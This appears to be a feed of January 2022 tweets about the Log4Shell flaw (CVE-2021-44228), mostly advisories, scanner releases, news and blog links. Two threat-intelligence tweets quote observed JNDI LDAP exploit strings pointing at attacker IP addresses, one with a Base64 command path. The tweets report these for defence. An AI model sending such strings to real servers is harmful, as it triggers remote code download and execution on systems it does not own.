2022-01-15 18:30:04CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-15 15:11:59CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-15 15:11:02CVE-2021-44228 / Log4Shell / kwetsbaarheid in de Log4j-library - publicatie https://t.co/c5yM5rKybm https://t.co/kD7cLBH1DF https://www.google.com/calendar/event?eid=MWN0bTMxdmloajF2ajkxajJkYzhyaTY1dHYgYTN2ZWVuQG0&ctz=Europe/Amsterdam https://www.zdnet.com/article/log4j-after-white-house-meeting-google-calls-for-list-of-critical-open-source-projects/a3veen
2022-01-15 14:00:18Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 1.1M (audience size) CVE-2021-44515: 275.5K CVE-2022-2… https://t.co/uY7wHr3TQY https://twitter.com/i/web/status/1482351873214529541CVEtrends
2022-01-15 10:08:094/ CVE-2021-44228 Vulnerabilities in computer systems are given CVE-IDs, short numbers to track when they were fou… https://t.co/S7OklOidGX https://twitter.com/i/web/status/1481992002958987266AidMcLaughlin
2022-01-15 09:50:534/ CVE-2021-44228 Vulnerabilities in computer systems are given CVE-IDs, short numbers to track when they were fou… https://t.co/S7OklOidGX https://twitter.com/i/web/status/1481992002958987266AidMcLaughlin
2022-01-15 09:23:044/ CVE-2021-44228 Vulnerabilities in computer systems are given CVE-IDs, short numbers to track when they were fou… https://t.co/S7OklOidGX https://twitter.com/i/web/status/1481992002958987266AidMcLaughlin
2022-01-15 09:13:03#Apache Druid Log4Shell Direct Check (CVE-2021-44228) https://t.co/PHXMxFcb7h #Nessus https://www.tenable.com/plugins/nessus/156753SecurityNewsbot
2022-01-15 08:20:20Apache Druid Log4Shell Direct Check (CVE-2021-44228) https://t.co/sjqQHSeaHC https://ift.tt/3FsHCrhcc_cyberdefence
2022-01-15 05:50:54How we ended up with #log4shell aka CVE-2021-44228 https://t.co/ZkAtOmuW6F https://t.co/xwgp28Cnel http://dlvr.it/SH8zVscloudplaninc
2022-01-15 05:01:08Example CVE-2021-44228 payload: ${jndi:ldap://160.36.59.113:1389/amtj4j} Path targeted: /websso/SAML2/SSO/?SAMLReq… https://t.co/81crgtg4pm https://twitter.com/i/web/status/1482213844046925826bad_packets
2022-01-15 03:40:23It's hard to distinguish between the endless CVE-2021-44228 related intrusions, and any particular uptick in activi… https://t.co/CU2DK8DpNJ https://twitter.com/i/web/status/1482195668827529220ImposeCost
2022-01-14 23:12:52#CyberSecurity: #Log4j, #Ivanti Products Impact Mapping https://t.co/0h2qkEYgVL @GoIvanti 𝞝 CVE-2021-44228… https://t.co/8jCvovkrUz https://bit.ly/3fs6cy4-Ttx https://twitter.com/i/web/status/1482125534377254914Totocellux
2022-01-14 21:20:57December 2021: Apache #Log4J critical vulnerability CVE-2021-44228 spawned numerous reports by the @Hacker0x01 rese… https://t.co/JyUOnzcG51 https://twitter.com/i/web/status/1482098836982091777DC3VDP
2022-01-14 17:41:29Ivanti has released security updates and workarounds for multiple products to address Log4j CVE-2021-44228. Learn m… https://t.co/FwoSED5XHC https://twitter.com/i/web/status/1482043693246959618USCERT_gov
2022-01-14 15:31:10"Log4Shell aka CVE-2021-44228 (CVSS score: 10.0) concerns a critical #security vulnerability in the popular #Log4j… https://t.co/nMlnFn2x4c https://twitter.com/i/web/status/1482012194522939392MalwarePatrol
2022-01-14 15:12:57CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-14 14:00:13Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2022-20658: 1M (audience size) CVE-2021-44228: 585.3K CVE-2022-219… https://t.co/2zJlTvnXxB https://twitter.com/i/web/status/1481989484912820225CVEtrends
2022-01-14 00:13:02Our Salt Labs researchers have compiled everything you need to know about the #Log4Shell (CVE-2021-44228) vulnerabi… https://t.co/pfg5Nu7sVi https://twitter.com/i/web/status/1481778439900307459SaltSecurity
2022-01-13 22:20:29#HCL #Knowledgebase CVE-2021-44228 + CVE-2021-45046 + CVE-2021-45105 + CVE-2021-44832 + CVE-2021-4104, Log4J / Log4… https://t.co/BJw9XiuFG7 https://twitter.com/i/web/status/1481752885293731841domino_robot
2022-01-13 20:10:13Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/vbUiHeBhDZ 출처 @YouTube https://youtu.be/0-abhd-CLwQLuna_0x02
2022-01-13 19:13:36Mirai botnet spreading through log4j (CVE-2021-44228) exploitation 🕵️🔍 Scanner: 89.248.198.82 🇷🇺 Rogue LDAP: 🔥… https://t.co/2AhN5quAzN https://twitter.com/i/web/status/1481702702878969860abuse_ch
2022-01-13 19:10:42Example CVE-2021-44228 payload: User agent: ${jndi:ldap://194.40.243.24:1534/Basic/Command/Base64/[encoded]} Deco… https://t.co/Kzja5aSSAA https://twitter.com/i/web/status/1481704400519192582bad_packets
2022-01-13 17:40:55Log4J-Detect - with Multithreading - The script detects if a list of URLs are vulnerable to CVE-2021-44228 (Log4J/S… https://t.co/RNQis9Iqwh https://twitter.com/i/web/status/14816797123846512660dayCTF
2022-01-13 16:58:40For the 1st time, I've written a #blog in collab with Snehasish Konger on the recent CVE-2021-44228 #log4j vulnerab… https://t.co/VFdT7xM1FC https://twitter.com/i/web/status/1481667611733925888karar_sayak
2022-01-13 15:21:15CISA released its own Log4J scanner to provide a solution for CVE-2021-44228 and CVE-2021-45046. Check out the fu… https://t.co/kb4lZyXoNF https://twitter.com/i/web/status/1481644716487700492McAfee_ATR
2022-01-13 15:10:30CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-13 15:00:53Escanee aplicaciones en busca de vulnerabilidades #log4j CVE-2021-44228, CVE-2021-45046 y CVE-2021-45105 con la cap… https://t.co/3EWsJazjDs https://twitter.com/i/web/status/1481637229994799111a190468
2022-01-13 14:31:51Anche @wso2 è stato impattato dalla bufera #Log4j2 Zero-Day Vulnerability (CVE-2021-44228) e ha immediatamente rila… https://t.co/kONx25fcFj https://twitter.com/i/web/status/1481633915769081856ProfesiaIt
2022-01-13 13:42:51おぉ、徳丸さんがゲスト / vs CVE-2021-44228 (Log4Shell) w/ tokumaru-san and nagise-san https://t.co/eQAxGE8iYG https://anchor.fm/dokanai/episodes/vs-CVE-2021-44228-Log4Shell-w-tokumaru-san-and-nagise-san-e1c90lbmatsumana
2022-01-13 08:52:46Escanee aplicaciones en busca de vulnerabilidades #log4j CVE-2021-44228, CVE-2021-45046 y CVE-2021-45105 con la cap… https://t.co/myCjhYdQUG https://twitter.com/i/web/status/1481547097690230784FranciscoJCarb1
2022-01-13 07:00:12Log4j (CVE-2021-44228) RCE Vulnerability Explained https://t.co/l2gCQxsMun https://youtu.be/0-abhd-CLwQjerwni
2022-01-13 03:21:27As CVE-2021-44228 continues to loom, here are some mitigation actions from Vulcan Cyber’s Lior Ben Dayan that you c… https://t.co/YPpKyXfiHR https://twitter.com/i/web/status/1481402317610131458VulcanCyber
2022-01-13 03:07:47As CVE-2021-44228 continues to loom, here are some mitigation actions from Vulcan Cyber’s Lior Ben Dayan that you c… https://t.co/YPpKyXfiHR https://twitter.com/i/web/status/1481402317610131458VulcanCyber
2022-01-13 02:53:08As CVE-2021-44228 continues to loom, here are some mitigation actions from Vulcan Cyber’s Lior Ben Dayan that you c… https://t.co/YPpKyXfiHR https://twitter.com/i/web/status/1481402317610131458VulcanCyber
2022-01-13 02:41:08脆弱性診断ツール「VAddy」、Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに ... https://t.co/GECNOXRINS https://t.co/0R1IlrIJ4o http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2022-01-13%2011%3A30 https://www.excite.co.jp/news/article/Prtimes_2022-01-12-22085-22/sec_trend
2022-01-13 00:51:28興味を持った記事: 脆弱性診断ツール「VAddy」、Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに提供を拡大:時事ドットコム - 時事通信 https://t.co/DYqATaflXs https://buff.ly/3Gpn2czmiyake_hikaru
2022-01-12 21:13:43Log4j - CVE-2021-44228: https://t.co/lIldZDPPoZ https://logging.apache.org/log4j/2.x/security.htmlLinInfoSec
2022-01-12 20:50:28Log4Shell HTTP Header Injection CVE: CVE-2021-44228 Risk: High #cybersecurity #hacking #security #hacker… https://t.co/tQ0I3T7FFP https://twitter.com/i/web/status/1481366784314064896Cybersec4u2
2022-01-12 18:51:55🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/OAC46XghwJ https://twitter.com/i/web/status/1481335984293920776threatintelctr
2022-01-12 18:10:19As detailed in our blog, CVE-2021-44228 reported a vulnerability in the Log4J Java library affecting applications a… https://t.co/Roqo8J3fH8 https://twitter.com/i/web/status/1481326867726712832McAfee_ATR
2022-01-12 18:00:09Escanee aplicaciones en busca de vulnerabilidades #log4j CVE-2021-44228, CVE-2021-45046 y CVE-2021-45105 con la cap… https://t.co/8q5xx8NXZk https://twitter.com/i/web/status/1481325101853384705HCLSoftware
2022-01-12 17:00:07Сканируйте приложения на наличие уязвимости #log4j CVE-2021-44228, CVE-2021-45046, &amp; CVE-2021-45105 при помощи HCL… https://t.co/Da6uw7X3sK https://twitter.com/i/web/status/1481310006343454721HCLSoftware
2022-01-12 16:50:52My Ansible code is officially part of the RHSB-2021-009 Log4Shell - Remote Code Execution - log4j (CVE-2021-44228)… https://t.co/QlOFy8q6VH https://twitter.com/i/web/status/1481305745459134465AnsiblePilot
2022-01-12 16:10:48Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに提供を拡大 - 時事通信 https://t.co/EhaGaMIZ5C https://t.co/Xnm8seFOak http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2022-01-13%2001%3A00 https://www.jiji.com/jc/article?k=000000022.000022085&g=prtsec_trend
2022-01-12 15:33:04CVE-2021-44228って書いてたわwavtvfh1125
2022-01-12 15:31:24The #NightSky #ransomware gang has begun to exploit the critical #CVE-2021-44228 vulnerability in the #Log4j loggin… https://t.co/vzgXTdFVBm https://twitter.com/i/web/status/1481287422281502720v2systems
2022-01-12 15:30:00APT35がLog4jの脆弱性(多分CVE-2021-44228)を悪用して、PowerShellのRATに感染させるという分析記事 https://t.co/IirPODL0Dp https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/avtvfh1125
2022-01-12 15:16:00CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-12 14:11:23Log4J-Detect &amp;#8211; Script To Detect The &amp;#8220;Log4j&amp;#8221; Java Library Vulnerability (CVE-2021-44228) For A Lis… https://t.co/F38cTvxmX0 https://twitter.com/i/web/status/1481266699286769667__DarkSecrets__
2022-01-12 13:30:51Updates on the Apache Log4j CVE-2021-44228 vulnerability #SASusers https://t.co/GANL7kL50t https://blogs.sas.com/content/sgf/2022/01/07/cve-2021-44228-log4j/SAS_Cares
2022-01-12 13:12:21Following the recent Log4j vulnerability CVE-2021-44228, the Juniper Threat Labs team continues to monitor attacks… https://t.co/soShunJ0It https://twitter.com/i/web/status/1481250124345008129Benaroni
2022-01-12 11:12:39Risk analysis of Log4Shell (CVE-2021-44228) and mitigation https://t.co/P7Ei4BJGrQ https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.htmlreverseame
2022-01-12 10:20:26Log4j Vulnerability - CVE-2021-44228 - PoC Demo https://t.co/eBoDKJMsea via @YouTube https://youtu.be/ol5eiFGly4Iadamtheapiguy
2022-01-12 08:49:22@Tsukiyo_Luna そうだねCVE-2021-44228があったねbonoozi
2022-01-12 07:00:45svchostからCVE-2021-44228のマルウェアが検出されているかもってエラーが出とる。WindowsPCでもlog4jかかるの初めて見たtkuya
2022-01-12 06:13:59SAP kullanıcıları için #log4j yamaları yayınlandı. [CVE-2021-44228] Central Security Note for Remote Code Execution… https://t.co/sNbPdHsTag https://twitter.com/i/web/status/1481145150210514945huzeyfeonal
2022-01-12 05:42:34Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/d0JI6q4HYp https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/CyberFactsIT
2022-01-12 05:32:26Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/USCvIUNkwc https://twitter.com/i/web/status/1481134556065452036danielaelmi
2022-01-12 05:21:30脆弱性診断ツール「VAddy」、Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに提供を拡大 https://t.co/M2RrsgPgTu @PRTIMES_JPより https://prtimes.jp/main/html/rd/p/000000022.000022085.htmloha000
2022-01-12 04:41:33Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに提供を拡大 - 産経ニュース https://t.co/TjkObKP0r8 https://t.co/tynE5nK7hg http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2022-01-12%2013%3A30 https://www.sankei.com/economy/news/220112/prl2201120100-n1.htmlsec_trend
2022-01-12 04:33:59https://t.co/vwdvlsuPP1:脆弱性診断ツール「VAddy」、Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに提供を拡大 https://t.co/QBFl566ooy http://ASCII.jp https://ascii.jp/elem/000/004/080/4080033/ohhara_shiojiri
2022-01-12 03:55:20株式会社ビットフォレスト、脆弱性診断ツール「VAddy」、Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに提供を拡大 https://t.co/RTDdeDAzdD https://newsrelea.se/7zMMN0Newsrelease_IT
2022-01-12 02:00:26【VAddyプレスリリース】 Apache Log4jの脆弱性(CVE-2021-44228)検査機能を無料トライアルを含む全てのユーザーに開放しました。 https://t.co/WIhirw8dyA https://vaddy.net/ja/release/20220112.htmlvaddynet
2022-01-12 01:50:49脆弱性診断ツール「VAddy」、Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに提供を拡大 https://t.co/ev9HRX6mm4 https://prtimes.jp/main/html/rd/p/000000022.000022085.htmlPRTIMES_TECH
2022-01-12 01:41:36Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに提供を拡大|株式 ... - PR TIMES https://t.co/u27lVSSrLD https://t.co/IKgd9ROFVf http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2022-01-12%2010%3A30 https://prtimes.jp/main/html/rd/p/000000022.000022085.htmlsec_trend
2022-01-12 01:21:26脆弱性診断ツール「VAddy」、Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに提供を拡大 https://t.co/JAXhmcVNqO https://wmr.tokyo/startup/2022/107251/wmr_startup
2022-01-12 01:21:07脆弱性診断ツール「VAddy」、Apache Log4jの脆弱性(CVE-2021-44228)検査を全ユーザーに提供を拡大 https://t.co/1BfyYodnVy https://prtimes.jp/main/html/rd/p/000000022.000022085.htmlPRTIMES_NEWS
2022-01-12 01:20:09Vulnerability diagnosis tool “VAddy” expands the provision of Apache Log4j vulnerability (CVE-2021-44228) inspectio… https://t.co/re521PVQOz https://twitter.com/i/web/status/1481072582170451968rehownet2
2022-01-12 00:25:33HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/e4kD8DjkHT https://t.co/wBgODVMkfc https://bit.ly/3rgLxmaJairoCanuto
2022-01-11 21:01:23Scan applications #log4j vulnerabilities #cve CVE-2021-44228, CVE-2021-45046, &amp; CVE-2021-45105 #hclswlobp… https://t.co/Q7o7QCpzfY https://twitter.com/i/web/status/1481006730477805580FraCurzi
2022-01-11 20:30:19「Night Skyランサムウェアギャングは、Log4Shellとも呼ばれるLog4jロギングライブラリの重大なCVE-2021-44228の脆弱性を悪用して、VMwareHorizo​​nシステムにアクセスし始めました。」 https://t.co/q016CxrqGV https://twitter.com/foxbook/status/1480999147897511947foxbook
2022-01-11 20:30:10An example of vulnerability that your systems may have is the CVE-2021-44228-Log4j. A seemingly dormant file that h… https://t.co/icSSsCZlWw https://twitter.com/i/web/status/1480999742607925253boggssph
2022-01-11 20:30:05Scan applications for #log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, &amp; CVE-2021-45105 with HCL AppScan's Op… https://t.co/qA8GsEfkvC https://twitter.com/i/web/status/1481000095034351620stefanopog
2022-01-11 19:40:58Apache log4j2 log messages substitution (CVE-2021-44228) https://t.co/zRLrjikDH4 http://dlvr.it/SGxT5VFortinetGuide
2022-01-11 16:50:17Attackers are exploiting the #Log4Shell vulnarability (CVE-2021-44228) in internet-facing systems running VMware Ho… https://t.co/0VOZ7y8U7T https://twitter.com/i/web/status/1480944951651446786mdcstp
2022-01-11 16:42:17Scan applications for #log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, &amp; CVE-2021-45105 with HCL AppScan's Op… https://t.co/8JMRGGCbxA https://twitter.com/i/web/status/1480940204160659462a190468
2022-01-11 15:11:21CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-11 15:00:16Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/LkmxlCvW9W https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/reverseame
2022-01-11 14:50:08#Apache JSPWiki Log4Shell Direct Check (CVE-2021-44228) https://t.co/SiyLeTxAaL #Nessus https://www.tenable.com/plugins/nessus/156558SecurityNewsbot
2022-01-11 14:31:43@780thC Micrsoft picked up a China-based ransomware operator tracking as DEV-0401 exploiting the CVE-2021-44228 vu… https://t.co/sj4lRkkGNB https://twitter.com/i/web/status/1480909920329355264softwarnet
2022-01-11 14:19:24A summary of notes, observations, and actions used to address Log4j2 CVE-2021-44228 gathered by Uptycs Chief Softwa… https://t.co/iGUgZ2oDNk https://twitter.com/i/web/status/1480903354121396228uptycs
2022-01-11 14:00:58Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-30970: 1.8M (audience size) CVE-2021-44228: 765.5K CVE-2022-0… https://t.co/VUP56Ytvim https://twitter.com/i/web/status/1480902321865379850CVEtrends
2022-01-11 13:01:48As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems run… https://t.co/iHxwmP6Ady https://twitter.com/i/web/status/1480885874909151238iejirok
2022-01-11 11:50:38The Night Sky ransomware gang has started to exploit the critical CVE-2021-44228 vulnerability in the Log4j logging… https://t.co/UhlyeXRNt5 https://twitter.com/i/web/status/1480868264825794562jbhall56
2022-01-11 11:50:12CVE-2021-44228 #Log4Shell: Preparing a Virtual Environment using VirtualBox https://t.co/i7oTS9WXjJ https://blog.openthreatresearch.com/preparing_log4shell_environmentswitch_d
2022-01-11 11:01:26Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/seOKdiHl00 https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/reverseame
2022-01-11 08:00:43HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/jr0YBxEyoJ https://t.co/LErEp8Sq99 https://bit.ly/3GifEQaBusiness_Juan
2022-01-11 08:00:09CVE-2021-44228 vulnerability in Apache Log4j library https://t.co/kIrPmHbVfb https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210reverseame
2022-01-11 04:50:50Apache log4j Vulnerability CVE-2021-44228: Analysis and Mitigations https://t.co/QEOUZm9TZL https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/PVynckier
2022-01-11 04:10:44Log4jの脆弱性CVE-2021-44228の悪用状況観測アップデート。マイクロソフトがDEV-0401でトラックしているランサムウェアのオペレーターがインターネットに面するVMWare Horizonのシステムを攻撃しNigh… https://t.co/krKHgAA6uP https://twitter.com/i/web/status/1480752201907666944EurekaBerry
2022-01-11 03:20:23El grupo de inteligencia de Microsoft Security ha logrado determinar que la vulnerabilidad CVE-2021-44228 (Log4j 2)… https://t.co/ME7acPHW1u https://twitter.com/i/web/status/1480740632641556485betocatuta
2022-01-11 02:40:44We have observed a China-based ransomware operator that we’re tracking as DEV-0401 exploiting the CVE-2021-44228 vu… https://t.co/zjvOgE7QTU https://twitter.com/i/web/status/1480730559739359233MsftSecIntel
2022-01-11 00:40:04How we ended up with #log4shell aka CVE-2021-44228 #cloudsecurity https://t.co/ccgOPP78DI https://cloudsecurityalliance.org/articles/how-we-ended-up-with-log4shell-aka-cve-2021-44228/CLAVDIAmartin
2022-01-10 18:30:57How'd we end up with #log4shell aka CVE-2021-44228? https://t.co/XgShxFL93K TL;DR: Feature, speed, and agility firs… https://t.co/xv6HgE5WxW https://cloudsecurityalliance.org/blog/2022/01/10/how-we-ended-up-with-log4shell-aka-cve-2021-44228/ https://twitter.com/i/web/status/1480606921807724544kurtseifried
2022-01-10 17:31:22https://t.co/Q56P2LGRKB How we ended up with #log4shell aka CVE-2021-44228 #cybersecurity https://cloudsecurityalliance.org/articles/how-we-ended-up-with-log4shell-aka-cve-2021-44228/netsecu
2022-01-10 16:00:08Analysis of Initial In The Wild Attacks Exploiting Log4Shell/Log4J/CVE-2021-44228 https://t.co/xlWNyzfxEK https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/reverseame
2022-01-10 15:10:22CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-10 15:10:19Following the recent Log4j vulnerability CVE-2021-44228, the Juniper Threat Labs team continues to monitor attacks… https://t.co/EAL96PXIDY https://twitter.com/i/web/status/1480555300109406209MattDamonJunip1
2022-01-10 14:00:19How we ended up with #log4shell aka CVE-2021-44228 #infosec #infosecurity #cybersecurity #threatintel… https://t.co/MyVMMEICN4 https://twitter.com/i/web/status/1480538517398827011CyberIQs_
2022-01-10 13:50:15A remote code execution (RCE) exploit found in #log4j (CVE-2021-44228) affects the most widely-employed logging fra… https://t.co/3DPgWaY4ah https://twitter.com/i/web/status/1480534902378479621barracuda
2022-01-10 13:30:07Scan applications for #log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, &amp; CVE-2021-45105 with HCL AppScan's Op… https://t.co/zbWWNIYUIu https://twitter.com/i/web/status/1480530495289151499bale1966
2022-01-10 12:10:19The latest critical 𝐀𝐩𝐚𝐜𝐡𝐞 𝐋𝐨𝐠 4𝐉 𝐯𝐮𝐥𝐧𝐞𝐫𝐚𝐛𝐢𝐥𝐢𝐭𝐲 (CVE-2021-44228) took the Internet by storm. Our recent blog discus… https://t.co/GmhMSAtSac https://twitter.com/i/web/status/1480510692117688320HarbingerSys
2022-01-10 12:10:07How we ended up with #log4shell aka CVE-2021-44228: Quick note: from now on I will refer to log4j version 2 as “log… https://t.co/dlvgrp9QGG https://twitter.com/i/web/status/1480511515589439490DTS_Solution
2022-01-10 12:10:05How we ended up with #log4shell aka CVE-2021-44228 https://t.co/mREIUFUEoB https://t.co/sBVWstc3Uf https://cloudsecurityalliance.org/articles/how-we-ended-up-with-log4shell-aka-cve-2021-44228/?utm_source=dlvr.it&utm_medium=twitterRigneySec
2022-01-10 08:40:06Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling Transformation Extender (CVE-2021-44228)… https://t.co/Ev2iWUCYer https://twitter.com/i/web/status/1480457584637325320PaulBrettIBM
2022-01-10 08:00:14Scan applications for #log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, &amp; CVE-2021-45105 with HCL AppScan's Op… https://t.co/BpqLsxa1dE https://twitter.com/i/web/status/1480447925679448067FranciscoJCarb1
2022-01-09 18:11:14[New] Searchable - #CISA #Log4j (CVE-2021-44228) Affected Vendor &amp; Software List =&gt; https://t.co/8DQYWgfjQm Thx Be… https://t.co/R5kJeVELVM https://lnkd.in/ecTT3vz5 https://twitter.com/i/web/status/1480238978028744706francoisquiquet
2022-01-09 15:30:38Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With...… https://t.co/2lBvYblFbC https://twitter.com/i/web/status/1480199090658971650beingsheerazali
2022-01-09 15:10:24CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-09 14:00:50Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-40444: 687.1K (audience size) CVE-2021-44228: 309.8K CVE-2021… https://t.co/uG5aRW0Dm5 https://twitter.com/i/web/status/1480177548361404416CVEtrends
2022-01-09 13:51:27"RT Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With… https://t.co/Bz9TsedBo4 https://twitter.com/i/web/status/1480172599917387777securisec
2022-01-09 13:22:16https://t.co/mH9fFH0fJq - Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) F… https://t.co/sdgfhTc89V http://earmas.ga https://twitter.com/i/web/status/1480164982289489928ApostolWario
2022-01-09 13:10:39Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With...… https://t.co/zOMkyWKmCH https://twitter.com/i/web/status/1480164641531731970KitPloit
2022-01-09 13:10:20Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With...… https://t.co/Rux10XItvD https://twitter.com/i/web/status/1480164898311135235Chahali
2022-01-09 09:50:18The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/oBATgc63Mi https://t.co/IB3hcwNtg7 https://bit.ly/31E4HtcBilekSimon
2022-01-09 08:20:20Apache JSPWiki Log4Shell Direct Check (CVE-2021-44228) https://t.co/UAodQBXOze https://ift.tt/3JJSep0cc_cyberdefence
2022-01-09 08:20:15VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028) https://t.co/4R6TZaT119 https://ift.tt/3G9EYHZcc_cyberdefence
2022-01-09 06:30:13Python Module To Scan Log4j RCE (CVE-2021-44228, CVE-2021-45046), 30 Obuscated WAF Payloads, MultiThreaded &amp; Reliab… https://t.co/WZjEldWxJP https://twitter.com/i/web/status/1480063508423143425PushpenderIndia
2022-01-09 05:40:05What you need to know about Apache Log4J CVE-2021-44228 &amp; CVE-2021-45046 #vmware #apache #log4j #cve #security #vmsa https://t.co/DhSAblrxlm https://dy.si/76fSea_masoudifard
2022-01-09 04:10:10Guide: How To #Detect and #Mitigate the #Log4Shell #Vulnerability (CVE-2021-44228/CVE-2021-45046) https://t.co/HwxDX3Pz99 https://vapt.me/Log4JMitigationomvapt
2022-01-08 20:10:15What you need to know about: #Log4Shell (CVE-2021-44228) See how it operates, and what makes it so severe:… https://t.co/sWzG3cOV4s https://twitter.com/i/web/status/1479905762910560259KerryMSpringer
2022-01-08 15:10:08CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-08 14:00:10CVE-2021-44228 vulnerability in Apache Log4j library https://t.co/YA0eBsPuAL https://t.co/J1Hjbma3U7 http://dlvr.it/SGlqTfThomasGarreau95
2022-01-08 14:00:07Apache Log4j Remote Code Injection Vulnerability CVE-2021-44228 Scanner: https://t.co/fWTj6P9OqC… https://t.co/TReNiyrBlQ https://securityforeveryone.com/tools/apache-remote-code-injection-in-log4j-cve-2021-44228 https://twitter.com/i/web/status/1479814936167694338secforeveryone
2022-01-08 13:40:09#Apache OFBiz Log4Shell Direct Check (CVE-2021-44228) https://t.co/0UzogXCjtc #Nessus https://www.tenable.com/plugins/nessus/156473SecurityNewsbot
2022-01-08 13:40:07#VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028) https://t.co/xiSEmWWhpE #Nessus https://www.tenable.com/plugins/nessus/156560SecurityNewsbot
2022-01-08 13:20:06⁦@IBMDACH⁩ list of products that have been remediated for Log4j 2.x CVE-2021-44228 have been updated https://t.co/mHetzm3SCd https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/fpientka
2022-01-08 13:20:05list of IBM products that have been remediated for Log4j 2.x CVE-2021-44228 have been updated. https://t.co/cCh943aU7N https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/#list-of-productsfpientka
2022-01-08 11:30:05Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/pHtCP1uv1Y https://twitter.com/i/web/status/1479775830041636864Tinolle1955
2022-01-08 11:30:04ゲスト徳丸さん / “vs CVE-2021-44228 (Log4Shell) w/ tokumaru-san and nagise-san by Tsundokanai Radio” https://t.co/BgbhXmA2lC https://htn.to/2rW227bnjksuginoy
2022-01-08 10:30:22The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/FLOG1sNb5M https://twitter.com/i/web/status/1479760238022692864mattkille33
2022-01-08 10:30:20#bugbountytips #bugbounty CVE-2021-44228 - Log4j RCE #Pentesting #appsec #CVE-2021-44228 More...… https://t.co/eFd6srd5ji https://twitter.com/i/web/status/1479761454664454147steiner254
2022-01-08 07:10:05#VMware has released a security advisory for 'VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-002… https://t.co/vqtULuCznj https://twitter.com/i/web/status/1479711310359273472cc_cyberdefence
